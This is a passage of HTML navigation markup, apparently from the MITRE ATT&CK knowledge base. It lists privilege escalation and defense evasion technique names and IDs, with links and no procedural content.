class="sidenav-head " id="enterprise-TA0004-T1134"> <a href="/versions/v9/techniques/T1134/"> Access Token Manipulation </a> <div class="expand-button collapsed" id="enterprise-TA0004-T1134-header" data-toggle="collapse" data-target="#enterprise-TA0004-T1134-body" aria-expanded="false" aria-controls="#enterprise-TA0004-T1134-body"></div> </div> <div class="sidenav-body collapse" id="enterprise-TA0004-T1134-body" aria-labelledby="enterprise-TA0004-T1134-header"> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0004-T1134-T1134.001"> <a href="/versions/v9/techniques/T1134/001/"> Token Impersonation/Theft </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0004-T1134-T1134.002"> <a href="/versions/v9/techniques/T1134/002/"> Create Process with Token </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0004-T1134-T1134.003"> <a href="/versions/v9/techniques/T1134/003/"> Make and Impersonate Token </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0004-T1134-T1134.004"> <a href="/versions/v9/techniques/T1134/004/"> Parent PID Spoofing </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0004-T1134-T1134.005"> <a href="/versions/v9/techniques/T1134/005/"> SID-History Injection </a> </div> </div> </div> </div> <div class="sidenav"> <div class="sidenav-head " id="enterprise-TA0004-T1547"> <a href="/versions/v9/techniques/T1547/"> Boot or Logon Autostart Execution </a> <div class="expand-button collapsed" id="enterprise-TA0004-T1547-header" data-toggle="collapse" data-target="#enterprise-TA0004-T1547-body" aria-expanded="false" aria-controls="#enterprise-TA0004-T1547-body"></div> </div> <div class="sidenav-body collapse" id="enterprise-TA0004-T1547-body" aria-labelledby="enterprise-TA0004-T1547-header"> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0004-T1547-T1547.001"> <a href="/versions/v9/techniques/T1547/001/"> Registry Run Keys / Startup Folder </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0004-T1547-T1547.002"> <a href="/versions/v9/techniques/T1547/002/"> Authentication Package </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0004-T1547-T1547.003"> <a href="/versions/v9/techniques/T1547/003/"> Time Providers </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0004-T1547-T1547.004"> <a href="/versions/v9/techniques/T1547/004/"> Winlogon Helper DLL </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0004-T1547-T1547.005"> <a href="/versions/v9/techniques/T1547/005/"> Security Support Provider </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0004-T1547-T1547.006"> <a href="/versions/v9/techniques/T1547/006/"> Kernel Modules and Extensions </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0004-T1547-T1547.007"> <a href="/versions/v9/techniques/T1547/007/"> Re-opened Applications </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0004-T1547-T1547.008"> <a href="/versions/v9/techniques/T1547/008/"> LSASS Driver </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0004-T1547-T1547.009"> <a href="/versions/v9/techniques/T1547/009/"> Shortcut Modification </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0004-T1547-T1547.010"> <a href="/versions/v9/techniques/T1547/010/"> Port Monitors </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0004-T1547-T1547.011"> <a href="/versions/v9/techniques/T1547/011/"> Plist Modification </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0004-T1547-T1547.012"> <a href="/versions/v9/techniques/T1547/012/"> Print Processors </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0004-T1547-T1547.013"> <a href="/versions/v9/techniques/T1547/013/"> XDG Autostart Entries </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0004-T1547-T1547.014"> <a href="/versions/v9/techniques/T1547/014/"> Active Setup </a> </div> </div> </div> </div> <div class="sidenav"> <div class="sidenav-head " id="enterprise-TA0004-T1037"> <a href="/versions/v9/techniques/T1037/"> Boot or Logon Initialization Scripts </a> <div class="expand-button collapsed" id="enterprise-TA0004-T1037-header" data-toggle="collapse" data-target="#enterprise-TA0004-T1037-body" aria-expanded="false" aria-controls="#enterprise-TA0004-T1037-body"></div> </div> <div class="sidenav-body collapse" id="enterprise-TA0004-T1037-body" aria-labelledby="enterprise-TA0004-T1037-header"> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0004-T1037-T1037.001"> <a href="/versions/v9/techniques/T1037/001/"> Logon Script (Windows) </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0004-T1037-T1037.002"> <a href="/versions/v9/techniques/T1037/002/"> Logon Script (Mac) </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0004-T1037-T1037.003"> <a href="/versions/v9/techniques/T1037/003/"> Network Logon Script </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0004-T1037-T1037.004"> <a href="/versions/v9/techniques/T1037/004/"> RC Scripts </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0004-T1037-T1037.005"> <a href="/versions/v9/techniques/T1037/005/"> Startup Items </a> </div> </div> </div> </div> <div class="sidenav"> <div class="sidenav-head " id="enterprise-TA0004-T1543"> <a href="/versions/v9/techniques/T1543/"> Create or Modify System Process </a> <div class="expand-button collapsed" id="enterprise-TA0004-T1543-header" data-toggle="collapse" data-target="#enterprise-TA0004-T1543-body" aria-expanded="false" aria-controls="#enterprise-TA0004-T1543-body"></div> </div> <div class="sidenav-body collapse" id="enterprise-TA0004-T1543-body" aria-labelledby="enterprise-TA0004-T1543-header"> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0004-T1543-T1543.001"> <a href="/versions/v9/techniques/T1543/001/"> Launch Agent </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0004-T1543-T1543.002"> <a href="/versions/v9/techniques/T1543/002/"> Systemd Service </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0004-T1543-T1543.003"> <a href="/versions/v9/techniques/T1543/003/"> Windows Service </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0004-T1543-T1543.004"> <a href="/versions/v9/techniques/T1543/004/"> Launch Daemon </a> </div> </div> </div> </div> <div class="sidenav"> <div class="sidenav-head " id="enterprise-TA0004-T1484"> <a href="/versions/v9/techniques/T1484/"> Domain Policy Modification </a> <div class="expand-button collapsed" id="enterprise-TA0004-T1484-header" data-toggle="collapse" data-target="#enterprise-TA0004-T1484-body" aria-expanded="false" aria-controls="#enterprise-TA0004-T1484-body"></div> </div> <div class="sidenav-body collapse" id="enterprise-TA0004-T1484-body" aria-labelledby="enterprise-TA0004-T1484-header"> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0004-T1484-T1484.001"> <a href="/versions/v9/techniques/T1484/001/"> Group Policy Modification </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0004-T1484-T1484.002"> <a href="/versions/v9/techniques/T1484/002/"> Domain Trust Modification </a> </div> </div> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0004-T1611"> <a href="/versions/v9/techniques/T1611/"> Escape to Host </a> </div> </div> <div class="sidenav"> <div class="sidenav-head " id="enterprise-TA0004-T1546"> <a href="/versions/v9/techniques/T1546/"> Event Triggered Execution </a> <div class="expand-button collapsed" id="enterprise-TA0004-T1546-header" data-toggle="collapse" data-target="#enterprise-TA0004-T1546-body" aria-expanded="false" aria-controls="#enterprise-TA0004-T1546-body"></div> </div> <div class="sidenav-body collapse" id="enterprise-TA0004-T1546-body" aria-labelledby="enterprise-TA0004-T1546-header"> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0004-T1546-T1546.001"> <a href="/versions/v9/techniques/T1546/001/"> Change Default File Association </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0004-T1546-T1546.002"> <a href="/versions/v9/techniques/T1546/002/"> Screensaver </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0004-T1546-T1546.003"> <a href="/versions/v9/techniques/T1546/003/"> Windows Management Instrumentation Event Subscription </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0004-T1546-T1546.004"> <a href="/versions/v9/techniques/T1546/004/"> Unix Shell Configuration Modification </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0004-T1546-T1546.005"> <a href="/versions/v9/techniques/T1546/005/"> Trap </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0004-T1546-T1546.006"> <a href="/versions/v9/techniques/T1546/006/"> LC_LOAD_DYLIB Addition </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0004-T1546-T1546.007"> <a href="/versions/v9/techniques/T1546/007/"> Netsh Helper DLL </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0004-T1546-T1546.008"> <a href="/versions/v9/techniques/T1546/008/"> Accessibility Features </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0004-T1546-T1546.009"> <a href="/versions/v9/techniques/T1546/009/"> AppCert DLLs </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0004-T1546-T1546.010"> <a href="/versions/v9/techniques/T1546/010/"> AppInit DLLs </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0004-T1546-T1546.011"> <a href="/versions/v9/techniques/T1546/011/"> Application Shimming </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0004-T1546-T1546.012"> <a href="/versions/v9/techniques/T1546/012/"> Image File Execution Options Injection </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0004-T1546-T1546.013"> <a href="/versions/v9/techniques/T1546/013/"> PowerShell Profile </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0004-T1546-T1546.014"> <a href="/versions/v9/techniques/T1546/014/"> Emond </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0004-T1546-T1546.015"> <a href="/versions/v9/techniques/T1546/015/"> Component Object Model Hijacking </a> </div> </div> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0004-T1068"> <a href="/versions/v9/techniques/T1068/"> Exploitation for Privilege Escalation </a> </div> </div> <div class="sidenav"> <div class="sidenav-head " id="enterprise-TA0004-T1574"> <a href="/versions/v9/techniques/T1574/"> Hijack Execution Flow </a> <div class="expand-button collapsed" id="enterprise-TA0004-T1574-header" data-toggle="collapse" data-target="#enterprise-TA0004-T1574-body" aria-expanded="false" aria-controls="#enterprise-TA0004-T1574-body"></div> </div> <div class="sidenav-body collapse" id="enterprise-TA0004-T1574-body" aria-labelledby="enterprise-TA0004-T1574-header"> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0004-T1574-T1574.001"> <a href="/versions/v9/techniques/T1574/001/"> DLL Search Order Hijacking </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0004-T1574-T1574.002"> <a href="/versions/v9/techniques/T1574/002/"> DLL Side-Loading </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0004-T1574-T1574.004"> <a href="/versions/v9/techniques/T1574/004/"> Dylib Hijacking </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0004-T1574-T1574.005"> <a href="/versions/v9/techniques/T1574/005/"> Executable Installer File Permissions Weakness </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0004-T1574-T1574.006"> <a href="/versions/v9/techniques/T1574/006/"> Dynamic Linker Hijacking </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0004-T1574-T1574.007"> <a href="/versions/v9/techniques/T1574/007/"> Path Interception by PATH Environment Variable </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0004-T1574-T1574.008"> <a href="/versions/v9/techniques/T1574/008/"> Path Interception by Search Order Hijacking </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0004-T1574-T1574.009"> <a href="/versions/v9/techniques/T1574/009/"> Path Interception by Unquoted Path </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0004-T1574-T1574.010"> <a href="/versions/v9/techniques/T1574/010/"> Services File Permissions Weakness </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0004-T1574-T1574.011"> <a href="/versions/v9/techniques/T1574/011/"> Services Registry Permissions Weakness </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0004-T1574-T1574.012"> <a href="/versions/v9/techniques/T1574/012/"> COR_PROFILER </a> </div> </div> </div> </div> <div class="sidenav"> <div class="sidenav-head " id="enterprise-TA0004-T1055"> <a href="/versions/v9/techniques/T1055/"> Process Injection </a> <div class="expand-button collapsed" id="enterprise-TA0004-T1055-header" data-toggle="collapse" data-target="#enterprise-TA0004-T1055-body" aria-expanded="false" aria-controls="#enterprise-TA0004-T1055-body"></div> </div> <div class="sidenav-body collapse" id="enterprise-TA0004-T1055-body" aria-labelledby="enterprise-TA0004-T1055-header"> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0004-T1055-T1055.001"> <a href="/versions/v9/techniques/T1055/001/"> Dynamic-link Library Injection </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0004-T1055-T1055.002"> <a href="/versions/v9/techniques/T1055/002/"> Portable Executable Injection </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0004-T1055-T1055.003"> <a href="/versions/v9/techniques/T1055/003/"> Thread Execution Hijacking </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0004-T1055-T1055.004"> <a href="/versions/v9/techniques/T1055/004/"> Asynchronous Procedure Call </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0004-T1055-T1055.005"> <a href="/versions/v9/techniques/T1055/005/"> Thread Local Storage </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0004-T1055-T1055.008"> <a href="/versions/v9/techniques/T1055/008/"> Ptrace System Calls </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0004-T1055-T1055.009"> <a href="/versions/v9/techniques/T1055/009/"> Proc Memory </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0004-T1055-T1055.011"> <a href="/versions/v9/techniques/T1055/011/"> Extra Window Memory Injection </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0004-T1055-T1055.012"> <a href="/versions/v9/techniques/T1055/012/"> Process Hollowing </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0004-T1055-T1055.013"> <a href="/versions/v9/techniques/T1055/013/"> Process Doppelgänging </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0004-T1055-T1055.014"> <a href="/versions/v9/techniques/T1055/014/"> VDSO Hijacking </a> </div> </div> </div> </div> <div class="sidenav"> <div class="sidenav-head " id="enterprise-TA0004-T1053"> <a href="/versions/v9/techniques/T1053/"> Scheduled Task/Job </a> <div class="expand-button collapsed" id="enterprise-TA0004-T1053-header" data-toggle="collapse" data-target="#enterprise-TA0004-T1053-body" aria-expanded="false" aria-controls="#enterprise-TA0004-T1053-body"></div> </div> <div class="sidenav-body collapse" id="enterprise-TA0004-T1053-body" aria-labelledby="enterprise-TA0004-T1053-header"> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0004-T1053-T1053.001"> <a href="/versions/v9/techniques/T1053/001/"> At (Linux) </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0004-T1053-T1053.002"> <a href="/versions/v9/techniques/T1053/002/"> At (Windows) </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0004-T1053-T1053.003"> <a href="/versions/v9/techniques/T1053/003/"> Cron </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0004-T1053-T1053.004"> <a href="/versions/v9/techniques/T1053/004/"> Launchd </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0004-T1053-T1053.005"> <a href="/versions/v9/techniques/T1053/005/"> Scheduled Task </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0004-T1053-T1053.006"> <a href="/versions/v9/techniques/T1053/006/"> Systemd Timers </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0004-T1053-T1053.007"> <a href="/versions/v9/techniques/T1053/007/"> Container Orchestration Job </a> </div> </div> </div> </div> <div class="sidenav"> <div class="sidenav-head " id="enterprise-TA0004-T1078"> <a href="/versions/v9/techniques/T1078/"> Valid Accounts </a> <div class="expand-button collapsed" id="enterprise-TA0004-T1078-header" data-toggle="collapse" data-target="#enterprise-TA0004-T1078-body" aria-expanded="false" aria-controls="#enterprise-TA0004-T1078-body"></div> </div> <div class="sidenav-body collapse" id="enterprise-TA0004-T1078-body" aria-labelledby="enterprise-TA0004-T1078-header"> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0004-T1078-T1078.001"> <a href="/versions/v9/techniques/T1078/001/"> Default Accounts </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0004-T1078-T1078.002"> <a href="/versions/v9/techniques/T1078/002/"> Domain Accounts </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0004-T1078-T1078.003"> <a href="/versions/v9/techniques/T1078/003/"> Local Accounts </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0004-T1078-T1078.004"> <a href="/versions/v9/techniques/T1078/004/"> Cloud Accounts </a> </div> </div> </div> </div> </div> </div> <div class="sidenav"> <div class="sidenav-head " id="enterprise-TA0005"> <a href="/versions/v9/tactics/TA0005"> Defense Evasion </a> <div class="expand-button collapsed" id="enterprise-TA0005-header" data-toggle="collapse" data-target="#enterprise-TA0005-body" aria-expanded="false" aria-controls="#enterprise-TA0005-body"></div> </div> <div class="sidenav-body collapse" id="enterprise-TA0005-body" aria-labelledby="enterprise-TA0005-header"> <div class="sidenav"> <div class="sidenav-head " id="enterprise-TA0005-T1548"> <a href="/versions/v9/techniques/T1548/"> Abuse Elevation Control Mechanism </a> <div class="expand-button collapsed" id="enterprise-TA0005-T1548-header" data-toggle="collapse" data-target="#enterprise-TA0005-T1548-body" aria-expanded="false" aria-controls="#enterprise-TA0005-T1548-body"></div> </div> <div class="sidenav-body collapse" id="enterprise-TA0005-T1548-body" aria-labelledby="enterprise-TA0005-T1548-header"> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0005-T1548-T1548.001"> <a href="/versions/v9/techniques/T1548/001/"> Setuid and Setgid </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0005-T1548-T1548.002"> <a href="/versions/v9/techniques/T1548/002/"> Bypass User Account Control </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0005-T1548-T1548.003"> <a href="/versions/v9/techniques/T1548/003/"> Sudo and Sudo Caching </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0005-T1548-T1548.004"> <a href="/versions/v9/techniques/T1548/004/"> Elevated Execution with Prompt </a> </div> </div> </div> </div> <div class="sidenav"> <div class="sidenav-head " id="enterprise-TA0005-T1134"> <a href="/versions/v9/techniques/T1134/"> Access Token Manipulation </a> <div class="expand-button collapsed" id="enterprise-TA0005-T1134-header" data-toggle="collapse" data-target="#enterprise-TA0005-T1134-body" aria-expanded="false" aria-controls="#enterprise-TA0005-T1134-body"></div> </div> <div class="sidenav-body collapse" id="enterprise-TA0005-T1134-body" aria-labelledby="enterprise-TA0005-T1134-header"> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0005-T1134-T1134.001"> <a href="/versions/v9/techniques/T1134/001/"> Token Impersonation/Theft </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0005-T1134-T1134.002"> <a href="/versions/v9/techniques/T1134/002/"> Create Process with Token </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0005-T1134-T1134.003"> <a href="/versions/v9/techniques/T1134/003/"> Make and Impersonate Token </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0005-T1134-T1134.004"> <a href="/versions/v9/techniques/T1134/004/"> Parent PID Spoofing </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0005-T1134-T1134.005"> <a href="/versions/v9/techniques/T1134/005/"> SID-History Injection </a> </div> </div> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0005-T1197"> <a href="/versions/v9/techniques/T1197/"> BITS Jobs </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0005-T1612"> <a href="/versions/v9/techniques/T1612/"> Build Image on Host </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0005-T1140"> <a href="/versions/v9/techniques/T1140/"> Deobfuscate/Decode Files or Information </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0005-T1610"> <a href="/versions/v9/techniques/T1610/"> Deploy Container </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0005-T1006"> <a href="/versions/v9/techniques/T1006/"> Direct Volume Access </a> </div> </div> <div class="sidenav"> <div class="sidenav-head " id="enterprise-TA0005-T1484"> <a href="/versions/v9/techniques/T1484/"> Domain Policy Modification </a> <div class="expand-button collapsed" id="enterprise-TA0005-T1484-header" data-toggle="collapse" data-target="#enterprise-TA0005-T1484-body" aria-expanded="false" aria-controls="#enterprise-TA0005-T1484-body"></div> </div> <div class="sidenav-body collapse" id="enterprise-TA0005-T1484-body" aria-labelledby="enterprise-TA0005-T1484-header"> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0005-T1484-T1484.001"> <a href="/versions/v9/techniques/T1484/001/"> Group Policy Modification </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0005-T1484-T1484.002"> <a href="/versions/v9/techniques/T1484/002/"> Domain Trust Modification </a> </div> </div> </div> </div> <div class="sidenav"> <div class="sidenav-head " id="enterprise-TA0005-T1480"> <a href="/versions/v9/techniques/T1480/"> Execution Guardrails </a> <div class="expand-button collapsed" id="enterprise-TA0005-T1480-header" data-toggle="collapse" data-target="#enterprise-TA0005-T1480-body" aria-expanded="false" aria-controls="#enterprise-TA0005-T1480-body"></div> </div> <div class="sidenav-body collapse" id="enterprise-TA0005-T1480-body" aria-labelledby="enterprise-TA0005-T1480-header"> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0005-T1480-T1480.001"> <a href="/versions/v9/techniques/T1480/001/"> Environmental Keying </a> </div> </div> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0005-T1211"> <a href="/versions/v9/techniques/T1211/"> Exploitation for Defense Evasion </a> </div> </div> <div class="sidenav"> <div class="sidenav-head " id="enterprise-TA0005-T1222"> <a href="/versions/v9/techniques/T1222/"> File and Directory Permissions Modification </a> <div class="expand-button collapsed" id="enterprise-TA0005-T1222-header" data-toggle="collapse" data-target="#enterprise-TA0005-T1222-body" aria-expanded="false" aria-controls="#enterprise-TA0005-T1222-body"></div> </div> <div class="sidenav-body collapse" id="enterprise-TA0005-T1222-body" aria-labelledby="enterprise-TA0005-T1222-header"> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0005-T1222-T1222.001"> <a href="/versions/v9/techniques/T1222/001/"> Windows File and Directory Permissions Modification </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0005-T1222-T1222.002"> <a href="/versions/v9/techniques/T1222/002/"> Linux and Mac File and Directory Permissions Modification </a> </div> </div> </div> </div> <div class="sidenav"> <div class="sidenav-head " id="enterprise-TA0005-T1564"> <a href="/versions/v9/techniques/T1564/"> Hide Artifacts </a> <div class="expand-button collapsed" id="enterprise-TA0005-T1564-header" data-toggle="collapse" data-target="#enterprise-TA0005-T1564-body" aria-expanded="false" aria-controls="#enterprise-TA0005-T1564-body"></div> </div> <div class="sidenav-body collapse" id="enterprise-TA0005-T1564-body" aria-labelledby="enterprise-TA0005-T1564-header"> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0005-T1564-T1564.001"> <a href="/versions/v9/techniques/T1564/001/"> Hidden Files and Directories </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0005-T1564-T1564.002"> <a href="/versions/v9/techniques/T1564/002/"> Hidden Users </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0005-T1564-T1564.003"> <a href="/versions/v9/techniques/T1564/003/"> Hidden Window </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0005-T1564-T1564.004"> <a href="/versions/v9/techniques/T1564/004/"> NTFS File Attributes </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0005-T1564-T1564.005"> <a href="/versions/v9/techniques/T1564/005/"> Hidden File System </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0005-T1564-T1564.006"> <a href="/versions/v9/techniques/T1564/006/"> Run Virtual Instance </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0005-T1564-T1564.007"> <a href="/versions/v9/techniques/T1564/007/"> VBA Stomping </a> </div> </div> </div> </div> <div class="sidenav"> <div class="sidenav-head " id="enterprise-TA0005-T1574"> <a href="/versions/v9/techniques/T1574/"> Hijack Execution Flow </a> <div class="expand-button collapsed" id="enterprise-TA0005-T1574-header" data-toggle="collapse" data-target="#enterprise-TA0005-T1574-body" aria-expanded="false" aria-controls="#enterprise-TA0005-T1574-body"></div> </div> <div class="sidenav-body collapse" id="enterprise-TA0005-T1574-body" aria-labelledby="enterprise-TA0005-T1574-header"> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0005-T1574-T1574.001"> <a href="/versions/v9/techniques/T1574/001/"> DLL Search Order Hijacking </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0005-T1574-T1574.002"> <a href="/versions/v9/techniques/T1574/002/"> DLL Side-Loading </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0005-T1574-T1574.004"> <a href="/versions/v9/techniques/T1574/004/"> Dylib Hijacking </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0005-T1574-T1574.005"> <a href="/versions/v9/techniques/T1574/005/"> Executable Installer File Permissions Weakness </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0005-T1574-T1574.006"> <a href="/versions/v9/techniques/T1574/006/"> Dynamic Linker Hijacking </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0005-T1574-T1574.007"> <a href="/versions/v9/techniques/T1574/007/"> Path Interception by PATH Environment Variable </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0005-T1574-T1574.008"> <a href="/versions/v9/techniques/T1574/008/"> Path Interception by Search Order Hijacking </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0005-T1574-T1574.009"> <a href="/versions/v9/techniques/T1574/009/"> Path Interception by Unquoted Path </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0005-T1574-T1574.010"> <a href="/versions/v9/techniques/T1574/010/"> Services File Permissions Weakness </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0005-T1574-T1574.011"> <a href="/versions/v9/techniques/T1574/011/"> Services Registry Permissions Weakness </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0005-T1574-T1574.012"> <a href="/versions/v9/techniques/T1574/012/"> COR_PROFILER </a> </div> </div> </div> </div> <div class="sidenav"> <div class="sidenav-head " id="enterprise-TA0005-T1562"> <a href="/versions/v9/techniques/T1562/"> Impair Defenses </a> <div class="expand-button collapsed" id="enterprise-TA0005-T1562-header" data-toggle="collapse" data-target="#enterprise-TA0005-T1562-body" aria-expanded="false" aria-controls="#enterprise-TA0005-T1562-body"></div> </div> <div class="sidenav-body collapse" id="enterprise-TA0005-T1562-body" aria-labelledby="enterprise-TA0005-T1562-header"> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0005-T1562-T1562.001"> <a href="/versions/v9/techniques/T1562/001/"> Disable or Modify Tools </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0005-T1562-T1562.002"> <a href="/versions/v9/techniques/T1562/002/"> Disable Windows Event Logging </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0005-T1562-T1562.003"> <a href="/versions/v9/techniques/T1562/003/"> Impair Command History Logging </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0005-T1562-T1562.004"> <a href="/versions/v9/techniques/T1562/004/"> Disable or Modify System Firewall </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0005-T1562-T1562.006"> <a href="/versions/v9/techniques/T1562/006/"> Indicator Blocking </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0005-T1562-T1562.007"> <a href="/versions/v9/techniques/T1562/007/"> Disable or Modify Cloud Firewall </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0005-T1562-T1562.008"> <a href="/versions/v9/techniques/T1562/008/"> Disable Cloud Logs 